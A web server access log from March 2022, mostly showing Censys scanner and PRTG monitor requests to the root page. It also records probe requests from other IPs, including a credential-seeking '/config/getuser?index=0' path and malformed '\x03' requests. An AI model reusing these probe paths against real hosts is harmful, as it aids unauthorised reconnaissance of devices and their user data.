31.220.3.140 - - [02/Mar/2022:07:59:08 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
31.220.3.140 - - [02/Mar/2022:07:59:14 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
212.91.246.72 - - [02/Mar/2022:07:59:18 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
51.254.59.113 - - [02/Mar/2022:07:59:21 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36"
31.220.3.140 - - [02/Mar/2022:07:59:39 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
31.220.3.140 - - [02/Mar/2022:08:00:09 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
212.91.246.72 - - [02/Mar/2022:08:00:18 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
31.220.3.140 - - [02/Mar/2022:08:00:20 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
31.220.3.140 - - [02/Mar/2022:08:00:29 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
31.220.3.140 - - [02/Mar/2022:08:00:49 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
45.137.23.152 - - [02/Mar/2022:08:01:10 +0100] "GET /doc/script/lib/seajs/config/sea-config.js HTTP/1.1" 404 346 "-" "Mozilla/5.0 (iPad; CPU OS 7_1_2 like Mac OS X; en-US) AppleWebKit/531.5.2 (KHTML, like Gecko) Version/4.0.5 Mobile/8B116 Safari/6531.5.2"
31.220.3.140 - - [02/Mar/2022:08:01:13 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
212.91.246.72 - - [02/Mar/2022:08:01:18 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
45.137.23.152 - - [02/Mar/2022:08:02:10 +0100] "GET /doc/script/lib/seajs/config/sea-config.js HTTP/1.1" 404 346 "-" "Mozilla/5.0 (iPad; CPU OS 7_1_2 like Mac OS X; en-US) AppleWebKit/531.5.2 (KHTML, like Gecko) Version/4.0.5 Mobile/8B116 Safari/6531.5.2"
212.91.246.72 - - [02/Mar/2022:08:02:18 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Mar/2022:08:03:18 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Mar/2022:08:04:18 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Mar/2022:08:05:18 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Mar/2022:08:06:18 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Mar/2022:08:07:18 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
75.119.145.87 - - [02/Mar/2022:08:08:17 +0100] "GET /config/getuser?index=0 HTTP/1.1" 404 319 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0"
212.91.246.72 - - [02/Mar/2022:08:08:18 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
45.227.254.49 - - [02/Mar/2022:08:08:58 +0100] "\x03" 501 316 "-" "-"
45.227.254.49 - - [02/Mar/2022:08:08:58 +0100] "\x03" 501 316 "-" "-"
212.91.246.72 - - [02/Mar/2022:08:09:18 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Mar/2022:08:10:18 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Mar/2022:08:11:18 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
